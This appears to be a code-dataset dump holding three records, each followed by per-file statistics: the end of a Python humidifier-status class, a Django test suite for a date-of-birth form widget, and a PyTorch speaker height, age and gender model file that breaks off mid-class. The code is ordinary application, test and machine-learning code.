                          self.details['night_light_brightness'], 'percent'))
        for line in disp1:
            print(f'{line[0]:.<29} {line[1]} {line[2]}')

    def displayJSON(self) -> str:
        """Return humidifier status and properties in JSON output."""
        sup = super().displayJSON()
        sup_val = json.loads(sup)
        sup_val.update(
            {
                'Mode': self.details['mode'],
                'Humidity': str(self.details['humidity']),
                'Mist Virtual Level': str(
                    self.details['mist_virtual_level']),
                'Mist Level': str(self.details['mist_level']),
                'Water Lacks': self.details['water_lacks'],
                'Humidity High': self.details['humidity_high'],
                'Water Tank Lifted': self.details['water_tank_lifted'],
                'Display': self.details['display'],
                'Automatic Stop Reach Target': self.details[
                    'automatic_stop_reach_target'],
                'Auto Target Humidity': str(self.config[
                    'auto_target_humidity']),
                'Automatic Stop': self.config['automatic_stop'],
            }
        )
        if self.night_light:
            sup_val['Night Light Brightness'] = self.details[
                'night_light_brightness']
        return json.dumps(sup_val)
| 33.585685
| 77
| 0.535574
| 5,255
| 48,800
| 4.839391
| 0.049477
| 0.041092
| 0.011797
| 0.016515
| 0.855924
| 0.82946
| 0.817231
| 0.790924
| 0.760175
| 0.741772
| 0
| 0.014193
| 0.33875
| 48,800
| 1,452
| 78
| 33.608815
| 0.773901
| 0.081291
| 0
| 0.744718
| 0
| 0
| 0.188563
| 0.02814
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083627
| false
| 0.037852
| 0.004401
| 0
| 0.220951
| 0.003521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b7884e10691241015a93d96a4ffea4d0d4d66b
| 22,718
|
py
|
Python
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 2
|
2018-03-22T15:50:10.000Z
|
2020-03-26T06:09:46.000Z
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 5
|
2017-02-09T20:21:11.000Z
|
2021-04-16T20:18:10.000Z
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 1
|
2017-02-09T20:14:27.000Z
|
2017-02-09T20:14:27.000Z
|
import datetime
from unittest import TestCase
from distutils.version import StrictVersion
import pytest
import django
from dobwidget import DateOfBirthWidget
from ..models import Person
from ..forms import PersonModelForm, DMYPersonModelForm, MDYPersonModelForm, YMDPersonModelForm
# Feature-detect the rendering change introduced in Django 1.10, which
# started emitting the bare ``required`` attribute on widget HTML.  The
# expected strings in the tests below are selected with this flag.
# NOTE(review): distutils.StrictVersion is deprecated in modern Python;
# adequate for the Django versions this suite targets.
django_version = django.get_version()
is_gt_dj110 = StrictVersion(django_version) >= StrictVersion('1.10.0')
@pytest.mark.django_db
class SimpleTestCase(TestCase):
    """Rendering tests for DateOfBirthWidget via the default model form.

    Each test carries two expected HTML strings because Django >= 1.10
    renders a ``required`` attribute on widget inputs; ``is_gt_dj110``
    selects the right one.  Field order here is DD / MM / YYYY.
    """

    def setUp(self):
        super(SimpleTestCase, self).setUp()
        self.person = Person(name="A person", date_of_birth=datetime.date(2000, 4, 4))

    def test_raw(self):
        # Unbound form: no value="..." attributes are rendered.
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
        )
        form = PersonModelForm()
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_instance(self):
        # Form bound to an instance: each subwidget carries its value.
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
        )
        form = PersonModelForm(instance=self.person)
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_POST(self):
        # Form bound to POST data: values round-trip and the date cleans.
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
        )
        form = PersonModelForm({
            'name': 'Example',
            'date_of_birth_0': '3',
            'date_of_birth_1': '5',
            'date_of_birth_2': '2001',
        })
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class DMYTestCase(SimpleTestCase):
    """Same assertions as SimpleTestCase, using the explicit DMY form.

    Expected HTML is identical to the default order (DD / MM / YYYY).
    """

    def test_raw(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
        )
        form = DMYPersonModelForm()
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_instance(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
        )
        form = DMYPersonModelForm(instance=self.person)
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_POST(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
        )
        form = DMYPersonModelForm({
            'name': 'Example',
            'date_of_birth_0': '3',
            'date_of_birth_1': '5',
            'date_of_birth_2': '2001',
        })
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class MDYTestCase(SimpleTestCase):
    """SimpleTestCase assertions for the MDY form.

    Subwidget order is MM / DD / YYYY, so the first input is the month.
    """

    def test_raw(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" required />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
        )
        form = MDYPersonModelForm()
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_instance(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="4" />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="4" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="4" required />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="4" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
        )
        form = MDYPersonModelForm(instance=self.person)
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_POST(self):
        # Note the POST keys: _0 is the month ('5'), _1 is the day ('3').
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="5" />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="3" />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="5" required />'
            u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="3" required />'
            u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
        )
        form = MDYPersonModelForm({
            'name': 'Example',
            'date_of_birth_0': '5',
            'date_of_birth_1': '3',
            'date_of_birth_2': '2001',
        })
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class YMDTestCase(SimpleTestCase):
    """SimpleTestCase assertions for the YMD form.

    Subwidget order is YYYY / MM / DD, so the first input is the year.
    """

    def test_raw(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" required />'
        )
        form = YMDPersonModelForm()
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_instance(self):
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2000" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="4" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2000" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="4" required />'
        )
        form = YMDPersonModelForm(instance=self.person)
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )

    def test_POST(self):
        # POST keys follow widget order: _0 is the year here.
        expected_lt_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2001" />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="3" />'
        )
        expected_gte_dj110 = (
            u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2001" required />'
            u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
            u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="3" required />'
        )
        form = YMDPersonModelForm({
            'name': 'Example',
            'date_of_birth_0': '2001',
            'date_of_birth_1': '5',
            'date_of_birth_2': '3',
        })
        field = form['date_of_birth']
        self.assertEqual(
            field.as_widget(),
            expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
        )
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
class BadOptionsTestCase(TestCase):
    """Validate that DateOfBirthWidget rejects malformed 'order' values."""

    def test_duplicate_order_elements_disallowed(self):
        # Bug fix: both constructor calls previously sat inside a single
        # pytest.raises block, so the second call was never executed once
        # the first raised.  Each invalid value needs its own block.
        with pytest.raises(ValueError):
            DateOfBirthWidget(order='YYMD')
        with pytest.raises(ValueError):
            DateOfBirthWidget(order='YYD')

    def test_invalid_options_disallowed(self):
        with pytest.raises(ValueError):
            DateOfBirthWidget(order='YMZ')

    def test_lowercase_disallowed(self):
        with pytest.raises(ValueError):
            DateOfBirthWidget(order='Ymd')

    def test_partial_options_disallowed(self):
        with pytest.raises(ValueError):
            DateOfBirthWidget(order='YM')
class InvalidInputTestCase(TestCase):
def test_single_invalid_input_is_equivalent_to_raw_text_inputs_but_invalid(self):
    """Non-numeric day/month values are echoed back verbatim and the form fails validation."""
    expected_lt_dj110 = (
        u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="a" />'
        u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="b" />'
        u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
    )
    expected_gte_dj110 = (
        u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="a" required />'
        u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="b" required />'
        u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
    )
    form = PersonModelForm({
        'name': 'Example',
        'date_of_birth_0': 'a',
        'date_of_birth_1': 'b',
        'date_of_birth_2': '2001',
    })
    field = form['date_of_birth']
    # Invalid input must surface as a field error, not be silently dropped.
    self.assertFalse(form.is_valid())
    self.assertIn('date_of_birth', form.errors)
    self.assertEqual(
        field.as_widget(),
        expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
    )
def test_invalid_month_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="1" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="14" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="1" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="14" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '1',
'date_of_birth_1': '14',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_invalid_date_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="29" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="29" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '29',
'date_of_birth_1': '2',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_invalid_date_far_future_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="21" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="198000000000000" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="21" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="198000000000000" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '21',
'date_of_birth_1': '2',
'date_of_birth_2': '198000000000000',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
class AttributesTestCase(TestCase):
    """Per-subwidget HTML attribute handling."""

    def test_attrs_can_be_specified_per_field(self):
        # ``attrs`` is shared by every sub-input; the ``*_attrs`` keyword
        # arguments each target exactly one sub-input.
        per_field_attrs = {
            'day_attrs': {'data-type': 'day'},
            'month_attrs': {'data-type': 'month'},
            'year_attrs': {'data-type': 'year'},
        }
        widget = DateOfBirthWidget(attrs={'data-foo': 'bar'}, **per_field_attrs)
        rendered = widget.render('date_of_birth', None)
        self.assertEqual(
            rendered,
            u'<input data-foo="bar" data-type="day" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
            u'<input data-foo="bar" data-type="month" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
            u'<input data-foo="bar" data-type="year" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
        )
| 54.349282
| 156
| 0.626772
| 3,314
| 22,718
| 3.971334
| 0.039228
| 0.111694
| 0.204772
| 0.090267
| 0.911709
| 0.907606
| 0.904111
| 0.901071
| 0.89165
| 0.869843
| 0
| 0.061485
| 0.221807
| 22,718
| 417
| 157
| 54.479616
| 0.682957
| 0
| 0
| 0.595238
| 0
| 0.261905
| 0.555419
| 0.195088
| 0
| 0
| 0
| 0
| 0.087302
| 1
| 0.058201
| false
| 0
| 0.021164
| 0
| 0.097884
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be1282d119311979c7fa018e72c5e999fabaf9d1
| 11,018
|
py
|
Python
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 30
|
2021-04-05T10:36:34.000Z
|
2022-03-03T07:06:11.000Z
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 5
|
2021-02-04T19:36:16.000Z
|
2021-09-01T18:29:57.000Z
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 18
|
2021-03-18T07:50:39.000Z
|
2022-03-30T10:47:11.000Z
|
import torch
import torch.nn as nn
import wavencoder
# from transformers import Wav2Vec2Model
# torch.use_deterministic_algorithms(True)
class Wav2VecLSTM(nn.Module):
    """Wav2Vec feature extractor + attentive LSTM predicting height and age
    (regression) and gender (sigmoid binary classification)."""

    def __init__(self, lstm_h, lstm_inp=512):
        super().__init__()
        self.encoder = wavencoder.models.Wav2Vec(pretrained=True)
        # Freeze the whole pretrained encoder, then unfreeze only the last
        # convolutional layers (index 5 onwards) for fine-tuning.
        for param in self.encoder.parameters():
            param.requires_grad = False
        for param in self.encoder.feature_extractor.conv_layers[5:].parameters():
            param.requires_grad = True
        self.lstm = nn.LSTM(lstm_inp, lstm_h, batch_first=True)
        self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
        self.height_regressor = nn.Linear(lstm_h, 1)
        self.age_regressor = nn.Linear(lstm_h, 1)
        self.gender_classifier = nn.Sequential(
            nn.Linear(lstm_h, 1),
            nn.Sigmoid()
        )

    def forward(self, x):
        feats = self.encoder(x)
        # Encoder output is (batch, features, time); LSTM wants (batch, time, features).
        lstm_out, _ = self.lstm(feats.transpose(1, 2))
        pooled = self.attention(lstm_out)
        return (
            self.height_regressor(pooled),
            self.age_regressor(pooled),
            self.gender_classifier(pooled),
        )
class SpectralLSTM(nn.Module):
    """Attentive LSTM over 128-dim spectral frames; outputs height, age and
    gender predictions from the pooled representation."""

    def __init__(self, lstm_h):
        super().__init__()
        self.lstm = nn.LSTM(128, lstm_h, batch_first=True)
        self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)

        def regression_head():
            # Two-layer MLP producing a single scalar.
            return nn.Sequential(
                nn.Linear(lstm_h, lstm_h),
                nn.ReLU(),
                nn.Linear(lstm_h, 1))

        self.height_regressor = regression_head()
        self.age_regressor = regression_head()
        self.gender_classifier = nn.Sequential(
            nn.Linear(lstm_h, lstm_h),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(lstm_h, 1),
            nn.Sigmoid())

    def forward(self, x):
        # Drop the channel dimension; presumably (batch, 1, 128, T) -> (batch, 128, T). TODO confirm.
        spec = x.squeeze(1)
        lstm_out, _ = self.lstm(spec.transpose(1, 2))
        pooled = self.attention(lstm_out)
        return (
            self.height_regressor(pooled),
            self.age_regressor(pooled),
            self.gender_classifier(pooled),
        )
class SpectralCNNLSTM(nn.Module):
    """1-D CNN front end over 40-dim spectral features, followed by an
    attentive LSTM; predicts height, age and gender."""

    def __init__(self, lstm_h):
        super().__init__()
        # All internal widths are half the nominal hidden size.
        half = int(lstm_h / 2)
        self.encoder = nn.Sequential(
            nn.Conv1d(40, half, 5),
            nn.ReLU(),
            nn.BatchNorm1d(half),
            nn.Conv1d(half, half, 5),
            nn.ReLU(),
            nn.BatchNorm1d(half),
        )
        self.lstm = nn.LSTM(half, half, batch_first=True)
        self.attention = wavencoder.layers.SoftAttention(half, half)

        def regression_head():
            # Two-layer MLP producing a single scalar.
            return nn.Sequential(
                nn.Linear(half, half),
                nn.ReLU(),
                nn.Linear(half, 1))

        self.height_regressor = regression_head()
        self.age_regressor = regression_head()
        self.gender_classifier = nn.Sequential(
            nn.Linear(half, half),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(half, 1),
            nn.Sigmoid())

    def forward(self, x):
        spec = x.squeeze(1)
        conv_out = self.encoder(spec)
        lstm_out, _ = self.lstm(conv_out.transpose(1, 2))
        pooled = self.attention(lstm_out)
        return (
            self.height_regressor(pooled),
            self.age_regressor(pooled),
            self.gender_classifier(pooled),
        )
class SpectralMultiScale(nn.Module):
    """Three parallel CNN branches (kernel sizes 3/5/7) over 40-dim spectral
    input, each ending in soft-attention pooling; the concatenated branch
    outputs feed height, age and gender heads."""

    def __init__(self, lstm_h):
        super().__init__()
        inp_dim = 40
        self.lstm_h = lstm_h

        def branch(kernel):
            # Three conv/pool stages sharing one kernel size, then attention pooling.
            return nn.Sequential(
                nn.BatchNorm1d(inp_dim),
                nn.Conv1d(inp_dim, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                nn.MaxPool1d(2, 2),
                nn.Conv1d(lstm_h, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                nn.MaxPool1d(2, 2),
                nn.Conv1d(lstm_h, lstm_h, kernel),
                nn.ReLU(),
                nn.BatchNorm1d(lstm_h),
                nn.MaxPool1d(2, 2),
                TransposeAttn(lstm_h)
            )

        self.cnn3 = branch(3)
        self.cnn5 = branch(5)
        self.cnn7 = branch(7)

        def head(extra=()):
            # MLP from the 3-branch concatenation down to one scalar;
            # ``extra`` appends the sigmoid for the gender output.
            return nn.Sequential(
                nn.Linear(3 * lstm_h, lstm_h),
                nn.ReLU(),
                nn.Linear(lstm_h, 1),
                *extra,
            )

        self.height_regressor = head()
        self.age_regressor = head()
        self.gender_regressor = head((nn.Sigmoid(),))

    def forward(self, x):
        spec = x.squeeze(1)
        features = torch.cat(
            [net(spec).view(-1, self.lstm_h) for net in (self.cnn3, self.cnn5, self.cnn7)],
            1,
        )
        return (
            self.height_regressor(features),
            self.age_regressor(features),
            self.gender_regressor(features),
        )
# height only models
class TransposeLSTM(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.lstm = nn.LSTM(lstm_h, lstm_h, batch_first=True)
# self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
def forward(self, x):
output, (hidden, _) = self.lstm(x.transpose(1,2))
# attn_output = self.attention(output)
attn_output = output[:, -1, :]
return attn_output
class TransposeAttn(nn.Module):
